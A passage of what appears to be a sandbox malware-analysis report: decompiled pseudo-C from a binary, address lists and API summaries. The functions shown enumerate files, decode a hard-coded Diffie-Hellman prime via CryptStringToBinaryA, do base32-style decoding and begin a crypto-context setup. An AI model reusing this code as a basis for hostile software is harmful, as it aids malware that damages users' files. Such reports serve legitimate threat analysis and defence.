									if(_t465 >= 0) {
										goto L44;
									}
									_t467 = E003D669B(_t486,  &_v108, _t591);
									_pop(_t486);
									__eflags = _t467;
									if(__eflags == 0) {
										goto L128;
									}
									goto L43;
								}
								__eflags =  *(_t474 + 0x10) & 0x00000004;
								if(( *(_t474 + 0x10) & 0x00000004) == 0) {
									goto L39;
								}
								goto L38;
							}
							_t553 =  *_t591;
							__eflags =  *((intOrPtr*)(_t553 + _t357 * 4 - 4)) - _t486;
							if( *((intOrPtr*)(_t553 + _t357 * 4 - 4)) == _t486) {
								goto L128;
							}
							goto L36;
						}
						_t538 = _t474;
						__eflags = E003D687A(_t591, _t474);
						if(__eflags >= 0) {
							_t486 = 0;
							__eflags = 0;
							goto L34;
						}
						_push(_v12);
						_push(_t562);
						_push(_t591);
						goto L20;
					}
				}
			}


















































































































































    0x003dd481
    0x003dd48a
    0x003dd48e
    0x003dd499
    0x003dd49c
    0x003dd49f
    0x003dd4a2
    0x003dd4a5
    0x003dd4a8
    0x00000000
    0x003dd4aa
    0x003dd4b1
    0x003dd4b4
    0x003dd4b9
    0x003dd4bc
    0x003dd4be
    0x00000000
    0x003dd4c6
    0x003dd4d1
    0x003dd4d4
    0x003dd4d9
    0x003dd4de
    0x003dd4e1
    0x003dd4e3
    0x003ddc49
    0x003ddc4c
    0x00000000
    0x003dd4e9
    0x003dd4ee
    0x003dd4f3
    0x003dd4f6
    0x003dd4f8
    0x003ddc22
    0x003ddc25
    0x003ddc2a
    0x003ddc2e
    0x003ddc38
    0x003ddc40
    0x003ddc46
    0x00000000
    0x003ddc2e
    0x003dd4fe
    0x003dd501
    0x003dd506
    0x003dd511
    0x003dd516
    0x003dd521
    0x003dd524
    0x003dd531
    0x003dd534
    0x003dd534
    0x003dd53b
    0x003dd526
    0x003dd526
    0x003dd526
    0x003dd518
    0x003dd518
    0x003dd518
    0x003dd508
    0x003dd508
    0x003dd508
    0x003dd544
    0x003dd546
    0x003dd549
    0x003dd54c
    0x003dd54e
    0x003dd550
    0x003dd550
    0x003dd552
    0x003dd557
    0x003dd55a
    0x003dd561
    0x003dd568
    0x003dd56b
    0x003dd56d
    0x00000000
    0x003dd573
    0x003dd57f
    0x003dd585
    0x003dd588
    0x003dd58d
    0x003dd593
    0x003dd598
    0x003dd59a
    0x003dd59d
    0x003dd5a0
    0x003dd5a3
    0x003dd5a7
    0x003dd5aa
    0x003dd5b1
    0x003dd5b4
    0x003dd5c4
    0x003dd5c7
    0x003dd5ca
    0x003dd5cf
    0x003dd5d2
    0x003dd5d4
    0x00000000
    0x00000000
    0x003dd5da
    0x003dd5dd
    0x003dd5e0
    0x003dd5e2
    0x003dd5e5
    0x003dd72a
    0x003dd72a
    0x003dd72d
    0x003dd730
    0x003dd732
    0x003dd740
    0x003dd740
    0x003dd744
    0x003dd74c
    0x003dd74c
    0x003dd753
    0x003dd753
    0x003dd756
    0x00000000
    0x00000000
    0x003dd75c
    0x003dd75f
    0x003dd793
    0x003dd793
    0x003dd798
    0x003dd7a4
    0x003dd7ae
    0x003dd7b7
    0x003dd7bb
    0x003dd7be
    0x003dd7c3
    0x003dd7c7
    0x003dd7ca
    0x003ddb83
    0x003ddb86
    0x00000000
    0x003ddb86
    0x003dd7d0
    0x003dd7d2
    0x00000000
    0x00000000
    0x003dd7d8
    0x003dd7da
    0x00000000
    0x00000000
    0x003dd7e0
    0x003dd7e2
    0x00000000
    0x00000000
    0x003dd7e8
    0x003dd7f0
    0x003dd7f0
    0x003dd7f5
    0x003dd7fb
    0x003dd7fb
    0x003dd7fb
    0x003dd7fe
    0x003dd7ff
    0x003dd804
    0x003dd809
    0x003dd80c
    0x003dd80e
    0x00000000
    0x003dd814
    0x003dd814
    0x003dd81f
    0x003dd826
    0x003dd82b
    0x003dd82e
    0x003dd830
    0x00000000
    0x00000000
    0x003dd836
    0x003dd83a
    0x003dd83e
    0x003dd8b5
    0x003dd8b5
    0x003dd8b8
    0x003dd8be
    0x003dd8c0
    0x003dd8c2
    0x003dd8c6
    0x003dd8cb
    0x003dd8d6
    0x003dd8df
    0x003dd8e2
    0x003dd8e6
    0x003dd8e9
    0x003dd8ec
    0x003dd8f2
    0x003dd8f5
    0x003dd8f8
    0x003dd904
    0x003dd8fa
    0x003dd8fa
    0x003dd8fa
    0x003dd911
    0x003dd91d
    0x003dd920
    0x003dd923
    0x003dd926
    0x003dd929
    0x003dd934
    0x003dd939
    0x003dd93c
    0x003dd92b
    0x003dd92b
    0x003dd92b
    0x003dd93f
    0x003dd941
    0x00000000
    0x003dd947
    0x003dd947
    0x003dd94f
    0x003dd954
    0x003dd95b
    0x003dd95e
    0x003dd961
    0x003dd964
    0x003dd967
    0x003dd973
    0x003dd978
    0x003dd97b
    0x003dd969
    0x003dd969
    0x003dd969
    0x003dd97e
    0x003dd980
    0x00000000
    0x003dd986
    0x003dd986
    0x003dd98a
    0x003dd98c
    0x003dd995
    0x003dd99a
    0x003dd99c
    0x003dd9bd
    0x003dd9c0
    0x003dd9c0
    0x003dd9c0
    0x003dd99e
    0x003dd9a1
    0x003dd9ac
    0x003dd9b5
    0x003dd9b5
    0x003dd99c
    0x003dd9c3
    0x003dd9c6
    0x003dd9ca
    0x003dd9d2
    0x003dd9d2
    0x003dd9d2
    0x003dd9cc
    0x003dd9cc
    0x003dd9cc
    0x003dd9d6
    0x003dd9d7
    0x003dd9d9
    0x003ddb10
    0x003ddb10
    0x003ddb15
    0x003ddb17
    0x003ddb30
    0x003ddb33
    0x003ddb42
    0x003ddb47
    0x003ddb48
    0x003ddb4b
    0x003ddb4d
    0x003ddb4d
    0x003ddb50
    0x003ddb53
    0x003ddb76
    0x003ddb79
    0x003dd782
    0x003dd782
    0x003dd785
    0x003dd789
    0x003dd78d
    0x003dd601
    0x003dd604
    0x003dd608
    0x003dd60d
    0x003dd610
    0x003dd612
    0x00000000
    0x00000000
    0x003dd626
    0x003dd62b
    0x003dd62e
    0x003dd630
    0x00000000
    0x00000000
    0x003dd639
    0x003dd641
    0x003dd644
    0x003dd649
    0x003dd64c
    0x003dd64e
    0x00000000
    0x00000000
    0x003dd654
    0x003dd658
    0x003dd6e7
    0x003dd6e7
    0x003dd6ea
    0x003dd6ed
    0x003dd6ee
    0x003dd6f1
    0x003dd6f3
    0x003dd6f5
    0x003dd6f7
    0x003dd70e
    0x003dd718
    0x003dd71b
    0x003dd720
    0x003ddbf7
    0x003ddbf7
    0x003ddbf9
    0x00000000
    0x00000000
    0x003ddbfb
    0x003ddbfd
    0x003ddc00
    0x003ddb90
    0x003ddb92
    0x003ddb95
    0x003ddbc7
    0x003ddbd1
    0x003ddbd4
    0x003ddbd9
    0x003ddbdc
    0x003ddbde
    0x00000000
    0x00000000
    0x003ddbef
    0x003ddbf4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003ddb97
    0x003ddb97
    0x003ddba3
    0x003ddba8
    0x003ddbab
    0x003ddbad
    0x00000000
    0x00000000
    0x003ddbb5
    0x003ddbba
    0x003ddbbb
    0x003ddbbe
    0x003ddbbf
    0x003ddbc2
    0x003ddbc5
    0x00000000
    0x00000000
    0x00000000
    0x003ddbc5
    0x00000000
    0x003ddb97
    0x003ddc0f
    0x003ddc14
    0x003ddc17
    0x003ddc19
    0x003ddc1b
    0x003ddc1b
    0x00000000
    0x003ddc19
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003dd6f9
    0x003dd6f9
    0x003dd6ff
    0x003dd704
    0x003dd707
    0x003dd707
    0x003dd709
    0x003dd709
    0x00000000
    0x003dd6f9
    0x003dd66c
    0x003dd671
    0x003dd674
    0x003dd676
    0x00000000
    0x00000000
    0x003dd67f
    0x003dd68a
    0x003dd68f
    0x003dd692
    0x003dd694
    0x00000000
    0x00000000
    0x003dd69c
    0x003dd69d
    0x003dd6a0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003dd6a2
    0x003dd6a2
    0x003dd6b4
    0x003dd6b9
    0x003dd6bc
    0x003dd6be
    0x00000000
    0x00000000
    0x003dd6c7
    0x003dd6d1
    0x003dd6d6
    0x003dd6d9
    0x003dd6db
    0x00000000
    0x00000000
    0x003dd6e1
    0x003dd6e2
    0x003dd6e5
    0x00000000
    0x00000000
    0x00000000
    0x003dd6e5
    0x00000000
    0x003ddb55
    0x003ddb55
    0x003ddb58
    0x003ddb5b
    0x003ddb5d
    0x00000000
    0x00000000
    0x003ddb61
    0x003ddb65
    0x003ddb65
    0x003ddb67
    0x003ddb6a
    0x003ddb6c
    0x00000000
    0x00000000
    0x003ddb6e
    0x003ddb71
    0x003ddb74
    0x00000000
    0x00000000
    0x00000000
    0x003ddb74
    0x00000000
    0x003ddb65
    0x003ddb53
    0x003ddb1b
    0x003ddb1f
    0x003ddb1f
    0x003ddb21
    0x003ddb24
    0x003ddb26
    0x00000000
    0x00000000
    0x003ddb28
    0x003ddb2b
    0x003ddb2e
    0x00000000
    0x00000000
    0x00000000
    0x003ddb2e
    0x00000000
    0x003dd9df
    0x003dd9e2
    0x003dd9e2
    0x003dd9e5
    0x003dd9e8
    0x003dd9ee
    0x003dd9ee
    0x003dd9f1
    0x003dd9f3
    0x003dd9f6
    0x003dd9f9
    0x003dda08
    0x003dda17
    0x003dda22
    0x003dda25
    0x003dda28
    0x003dda2b
    0x003dda2e
    0x003dda31
    0x003dda36
    0x003dda3d
    0x003dda45
    0x003dda4c
    0x003dda50
    0x003dda52
    0x003dda55
    0x003dda57
    0x003dda59
    0x003dda59
    0x003dda59
    0x003dda60
    0x003dda66
    0x003dda68
    0x003dda6a
    0x003dda6c
    0x003dda6e
    0x003dda6e
    0x003dda6e
    0x003dda6f
    0x003dda95
    0x003dda95
    0x003dda97
    0x00000000
    0x00000000
    0x003dda77
    0x003dda81
    0x003dda81
    0x003dda84
    0x003dda87
    0x003dda8a
    0x00000000
    0x00000000
    0x003dda8c
    0x003dda8f
    0x003dda91
    0x003dda91
    0x003dda91
    0x003dda92
    0x003dda92
    0x00000000
    0x003dda92
    0x003dda79
    0x003dda7c
    0x003dda7f
    0x00000000
    0x00000000
    0x00000000
    0x003dda7f
    0x003dda99
    0x003dda99
    0x003ddaa7
    0x003ddab1
    0x003ddabb
    0x003ddac8
    0x003ddacf
    0x003ddad1
    0x003ddaf2
    0x003ddaf2
    0x00000000
    0x003ddaf2
    0x003ddadb
    0x003ddae1
    0x003ddae7
    0x003ddae9
    0x00000000
    0x00000000
    0x003ddaeb
    0x003ddaee
    0x00000000
    0x003ddaee
    0x003dd9fb
    0x00000000
    0x003ddaf5
    0x003ddafb
    0x003ddafe
    0x003ddb04
    0x003ddb04
    0x003ddb04
    0x003ddb07
    0x003ddb07
    0x00000000
    0x003dd9ee
    0x003dd9d9
    0x003dd980
    0x003dd941
    0x003dd840
    0x003dd843
    0x003dd849
    0x003dd84b
    0x003dd88e
    0x003dd891
    0x003dd894
    0x003dd89c
    0x003dd896
    0x003dd896
    0x003dd896
    0x003dd8a1
    0x003dd8a3
    0x00000000
    0x003dd8a9
    0x003dd8ae
    0x003dd8b2
    0x003dd8b2
    0x003dd8b2
    0x00000000
    0x003dd8b2
    0x003dd8a3
    0x003dd84d
    0x003dd850
    0x003dd853
    0x003dd85d
    0x003dd862
    0x003dd855
    0x003dd855
    0x003dd855
    0x003dd865
    0x003dd867
    0x00000000
    0x003dd86d
    0x003dd86d
    0x003dd879
    0x003dd87f
    0x003dd881
    0x00000000
    0x00000000
    0x003dd874
    0x003dd878
    0x003dd878
    0x003dd878
    0x003dd889
    0x00000000
    0x003dd889
    0x003dd867
    0x003dd80e
    0x003dd761
    0x003dd765
    0x003dd76a
    0x003dd76c
    0x00000000
    0x00000000
    0x003dd773
    0x003dd779
    0x003dd77a
    0x003dd77c
    0x00000000
    0x00000000
    0x00000000
    0x003dd77c
    0x003dd746
    0x003dd74a
    0x00000000
    0x00000000
    0x00000000
    0x003dd74a
    0x003dd734
    0x003dd736
    0x003dd73a
    0x00000000
    0x00000000
    0x00000000
    0x003dd73a
    0x003dd5eb
    0x003dd5f4
    0x003dd5f6
    0x003dd728
    0x003dd728
    0x00000000
    0x003dd728
    0x003dd5fc
    0x003dd5ff
    0x003dd600
    0x00000000
    0x003dd600
    0x003dd56d

    APIs
    • memset.MSVCRT ref: 003DD588
      • Part of subcall function 003DA920: memset.MSVCRT ref: 003DAA03
      • Part of subcall function 003D665B: memset.MSVCRT ref: 003D6682
    • memset.MSVCRT ref: 003DDC38
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003DF261, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28encryption
    C-Code - Quality: 87%
    			E003DF261(void* __ecx, BYTE* _a4) {
				int _v8;
				char* _t6;
				signed int _t8;
				char* _t12;
				char _t13;
				char* _t16;

				_t12 = "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF";
				_t6 = _t12;
				_v8 = 0x80;
				_t16 =  &(_t6[1]);
				do {
					_t13 =  *_t6;
					_t6 =  &(_t6[1]);
				} while (_t13 != 0);
				_t8 = CryptStringToBinaryA(_t12, _t6 - _t16, 4, _a4,  &_v8, 0, 0);
				asm("sbb eax, eax");
				return  ~_t8 & _v8;
			}









    0x003df265
    0x003df26a
    0x003df26d
    0x003df274
    0x003df277
    0x003df277
    0x003df279
    0x003df27a
    0x003df28f
    0x003df297
    0x003df29e

    APIs
    • CryptStringToBinaryA.CRYPT32(FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF,FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF,00000004,00000000,00000080,00000000,00000000), ref: 003DF28F
    Strings
    • FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF, xrefs: 003DF265, 003DF28D, 003DF28E
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C2450, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 159
    C-Code - Quality: 72%
    			E003C2450(intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v536;
				char _v736;
				char _v1284;
				signed int _v1328;
				intOrPtr* _t49;
				signed int _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				signed int _t55;
				intOrPtr _t57;
				signed int _t62;
				signed int _t65;
				signed int _t69;
				long _t70;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				void* _t78;
				intOrPtr _t80;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t93;
				signed int _t96;
				signed int _t97;
				void* _t98;
				void* _t99;
				void* _t101;

				_t86 =  *0x3e8628; // 0x622508
				_t97 = 0;
				_push(0);
				_push( &_v536);
				_push(0x105);
				_push(_a4);
				_t96 = 0;
				_v8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x10))))() == 0) {
					L22:
					E003CBB40(_t97);
					 *_a8 = 0;
					return 0;
				} else {
					_t88 =  *0x3e8628; // 0x622508
					 *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x1d8))))( &_v536);
					_t78 = 0x105;
					_t49 =  &_v536;
					while( *_t49 != _t97) {
						_t49 = _t49 + 2;
						_t78 = _t78 - 1;
						if(_t78 != 0) {
							continue;
						} else {
							goto L22;
						}
						goto L24;
					}
					__eflags = _t78 - _t97;
					if(_t78 == _t97) {
						goto L22;
					} else {
						_t72 = 0x105 - _t78;
						_t50 = E003D1C50( &_v536, 0x105, L"*.*");
						__eflags = _t50;
						if(_t50 < 0) {
							goto L22;
						} else {
							_t80 =  *0x3e8628; // 0x622508
							_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t80 + 0x14))))( &_v536,  &_v1328);
							_v12 = _t52;
							__eflags = _t52 - 0xffffffff;
							if(_t52 == 0xffffffff) {
								goto L22;
							} else {
								__eflags = 0;
								 *((short*)(_t98 + _t72 * 2 - 0x214)) = 0;
								do {
									__eflags = _v1328 & 0x00000010;
									if((_v1328 & 0x00000010) != 0) {
										goto L16;
									} else {
										_t96 = _t96 + 1;
										_t73 = _t96 * 4;
										_t97 = E003D1D90(_t73, _t97);
										_t99 = _t99 + 8;
										__eflags = _t97;
										if(_t97 != 0) {
											_t62 = E003D1D90(0x208, 0);
											_t99 = _t99 + 8;
											 *(_t73 + _t97 - 4) = _t62;
											__eflags = _t62;
											if(__eflags != 0) {
												E003C9090(__eflags,  &_v736, 0x73);
												_push( &_v1284);
												_t65 = E003D0C10( *(_t73 + _t97 - 4), 0x105,  &_v736,  &_v536);
												_t99 = _t99 + 0x1c;
												__eflags = _t65;
												if(_t65 < 0) {
													_t96 = _t96 - 1;
													_t74 = _t96 * 4;
													E003CBB40( *((intOrPtr*)(_t74 + _t97)));
													_t101 = _t99 + 4;
													_push(_t97);
													__eflags = _t96;
													if(_t96 == 0) {
														E003CBB40();
														_t99 = _t101 + 4;
														_t97 = 0;
														__eflags = 0;
													} else {
														_push(_t74);
														_t69 = E003D1D90();
														_t99 = _t101 + 8;
														_t97 = _t69;
													}
												}
												goto L16;
											}
										}
									}
									L19:
									_t57 =  *0x3e8628; // 0x622508
									 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x34))))(_v12);
									__eflags = _v8;
									if(_v8 != 0) {
										 *_a8 = _t96;
										return _t97;
									} else {
										__eflags = _t96;
										while(_t96 != 0) {
											_t93 =  *((intOrPtr*)(_t97 + _t96 * 4 - 4));
											_t96 = _t96 - 1;
											E003CBB40(_t93);
											_t99 = _t99 + 4;
											__eflags = _t96;
										}
										goto L22;
									}
									goto L24;
									L16:
									_t54 =  *0x3e8628; // 0x622508
									_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x40))))(_v12,  &_v1328);
									__eflags = _t55;
								} while (_t55 != 0);
								_t70 = GetLastError();
								__eflags = _t70 - 0x12;
								if(_t70 == 0x12) {
									_v8 = 1;
								}
								goto L19;
							}
						}
					}
				}
				L24:
			}
































    0x003c245c
    0x003c2465
    0x003c2467
    0x003c246e
    0x003c2472
    0x003c2477
    0x003c2478
    0x003c247a
    0x003c2481
    0x003c2619
    0x003c261a
    0x003c262b
    0x003c2631
    0x003c2487
    0x003c2487
    0x003c249a
    0x003c249c
    0x003c24a1
    0x003c24a7
    0x003c24ac
    0x003c24af
    0x003c24b0
    0x00000000
    0x003c24b2
    0x00000000
    0x003c24b2
    0x00000000
    0x003c24b0
    0x003c24b7
    0x003c24b9
    0x00000000
    0x003c24bf
    0x003c24c9
    0x003c24d7
    0x003c24dc
    0x003c24de
    0x00000000
    0x003c24e4
    0x003c24e4
    0x003c24fb
    0x003c24fd
    0x003c2500
    0x003c2503
    0x00000000
    0x003c2509
    0x003c2509
    0x003c250b
    0x003c2513
    0x003c2513
    0x003c251a
    0x00000000
    0x003c2520
    0x003c2520
    0x003c2521
    0x003c252f
    0x003c2531
    0x003c2534
    0x003c2536
    0x003c2543
    0x003c2548
    0x003c254b
    0x003c254f
    0x003c2551
    0x003c2560
    0x003c256b
    0x003c2584
    0x003c2589
    0x003c258c
    0x003c258e
    0x003c2590
    0x003c2591
    0x003c259c
    0x003c25a1
    0x003c25a4
    0x003c25a5
    0x003c25a7
    0x003c25b6
    0x003c25bb
    0x003c25be
    0x003c25be
    0x003c25a9
    0x003c25a9
    0x003c25aa
    0x003c25af
    0x003c25b2
    0x003c25b2
    0x003c25a7
    0x00000000
    0x003c258e
    0x003c2551
    0x003c2536
    0x003c25ef
    0x003c25f2
    0x003c25fb
    0x003c25fd
    0x003c2601
    0x003c2635
    0x003c263f
    0x003c2603
    0x003c2603
    0x003c2605
    0x003c2607
    0x003c260b
    0x003c260d
    0x003c2612
    0x003c2615
    0x003c2615
    0x00000000
    0x003c2605
    0x00000000
    0x003c25c0
    0x003c25c3
    0x003c25d3
    0x003c25d5
    0x003c25d5
    0x003c25dd
    0x003c25e3
    0x003c25e6
    0x003c25e8
    0x003c25e8
    0x00000000
    0x003c25e6
    0x003c2503
    0x003c24de
    0x003c24b9
    0x00000000

    APIs
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    • GetLastError.KERNEL32 ref: 003C25DD
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D39C0, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 152Crypto
    C-Code - Quality: 15%
    			E003D39C0(intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _t53;
				unsigned char _t64;
				intOrPtr _t81;
				char _t82;
				void* _t83;
				int _t84;
				signed int _t85;
				void* _t88;
				signed int _t89;
				intOrPtr* _t91;
				intOrPtr _t92;
				signed int _t94;
				signed char _t98;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				signed int* _t128;
				signed int _t129;
				signed int* _t130;
				signed int _t131;
				signed int* _t132;
				signed int _t133;
				signed int* _t134;
				signed int _t135;

				_push(_t87);
				_t53 = _a8;
				_t88 = _t53 + 1;
				do {
					_t92 =  *_t53;
					_t53 = _t53 + 1;
				} while (_t92 != 0);
				_t84 = _t53 - _t88;
				_t123 = _t84 * 5;
				_v12 = _t123;
				_t119 =  *0x3e8538(_t84, _t118, _t121, _t83);
				memset(_t119, 0, _t84);
				_v8 = _v8 & 0x00000000;
				if(_t84 == 0) {
					L14:
					_t89 = 0;
					_t85 = 0;
					if(_t123 == 0) {
						L29:
						_t124 = _t89;
						L22:
						 *0x3e8540(_t119);
						return _t124;
					} else {
						goto L15;
					}
					do {
						L15:
						_t126 = 0x28;
						_t94 = _t85 % _t126;
						if(_t94 == 0) {
							_t127 = 5;
							_t128 = _t119 + _t85 / _t127;
							_t64 = _t128[0] >> 2;
							_t98 =  *_t128 << 3;
							L27:
							 *((char*)(_t89 + _a4)) = _t64 + _t98;
							goto L28;
						}
						if(_t94 == 8) {
							_t129 = 5;
							_t130 = _t119 + _t85 / _t129;
							_t64 = ( *_t130 << 5) + _t130[0] + ( *_t130 << 5) + _t130[0];
							_t98 = _t130[0] >> 4;
							goto L27;
						}
						if(_t94 == 0x10) {
							_t131 = 5;
							_t132 = _t119 + _t85 / _t131;
							_t64 = _t132[0] >> 1;
							_t98 =  *_t132 << 4;
							goto L27;
						}
						if(_t94 == 0x18) {
							_t133 = 5;
							_t134 = _t119 + _t85 / _t133;
							_t64 = (_t134[0] >> 3) + (_t134[0] << 2);
							_t98 =  *_t134 << 7;
							goto L27;
						}
						if(_t94 == 0x20) {
							_t135 = 5;
							 *((char*)(_t89 + _a4)) = ( *(_t119 + _t85 / _t135) << 5) +  *((intOrPtr*)(_t85 / _t135 + _t119 + 1));
						}
						L28:
						_t85 = _t85 + 8;
						_t89 = _t89 + 1;
					} while (_t85 < _v12);
					goto L29;
				}
				_t91 = _a8;
				_t117 = _t119 - _t91;
				do {
					_t81 =  *_t91;
					if(_t81 <= 0x60 || _t81 >= 0x7b) {
						if(_t81 <= 0x31 || _t81 >= 0x38) {
							if(_t81 <= 0x40 || _t81 >= 0x5b) {
								_t124 = 0;
								goto L22;
							} else {
								_t82 = _t81 - 0x41;
								goto L13;
							}
						} else {
							_t82 = _t81 - 0x18;
							goto L13;
						}
					} else {
						_t82 = _t81 - 0x61;
					}
					L13:
					_v8 = _v8 + 1;
					 *((char*)(_t117 + _t91)) = _t82;
					_t91 = _t91 + 1;
				} while (_v8 < _t84);
				goto L14;
			}


































    0x003d39c4
    0x003d39c5
    0x003d39c8
    0x003d39cb
    0x003d39cb
    0x003d39cd
    0x003d39ce
    0x003d39d6
    0x003d39da
    0x003d39df
    0x003d39e9
    0x003d39ee
    0x003d39f3
    0x003d39fc
    0x003d3a35
    0x003d3a35
    0x003d3a37
    0x003d3a3b
    0x003d3b1c
    0x003d3b1c
    0x003d3a8a
    0x003d3a8b
    0x003d3a98
    0x00000000
    0x00000000
    0x00000000
    0x003d3a41
    0x003d3a41
    0x003d3a47
    0x003d3a48
    0x003d3a4c
    0x003d3af4
    0x003d3af9
    0x003d3b01
    0x003d3b04
    0x003d3b07
    0x003d3b0c
    0x00000000
    0x003d3b0c
    0x003d3a55
    0x003d3ad6
    0x003d3adb
    0x003d3ae9
    0x003d3aeb
    0x00000000
    0x003d3aeb
    0x003d3a5a
    0x003d3abe
    0x003d3ac3
    0x003d3acb
    0x003d3acd
    0x00000000
    0x003d3acd
    0x003d3a5f
    0x003d3a9d
    0x003d3aa2
    0x003d3ab1
    0x003d3ab5
    0x00000000
    0x003d3ab5
    0x003d3a64
    0x003d3a70
    0x003d3a80
    0x003d3a80
    0x003d3b0f
    0x003d3b0f
    0x003d3b12
    0x003d3b13
    0x00000000
    0x003d3a41
    0x003d39fe
    0x003d3a03
    0x003d3a05
    0x003d3a05
    0x003d3a09
    0x003d3a15
    0x003d3a21
    0x003d3a88
    0x00000000
    0x003d3a27
    0x003d3a27
    0x00000000
    0x003d3a27
    0x003d3a1b
    0x003d3a1b
    0x00000000
    0x003d3a1b
    0x003d3a0f
    0x003d3a0f
    0x003d3a0f
    0x003d3a29
    0x003d3a29
    0x003d3a2c
    0x003d3a2f
    0x003d3a30
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C76E0, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 128
    C-Code - Quality: 53%
    			E003C76E0(void* _a4, int _a8, void* _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				char _v24;
				void _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				char _t42;
				intOrPtr _t43;
				intOrPtr _t46;
				void* _t50;
				intOrPtr _t55;
				void* _t63;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t71;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t94;

				_t64 =  *0x3e8628; // 0x622508
				_push(0xf0000000);
				_t63 = 0;
				_push(0x18);
				_push(0);
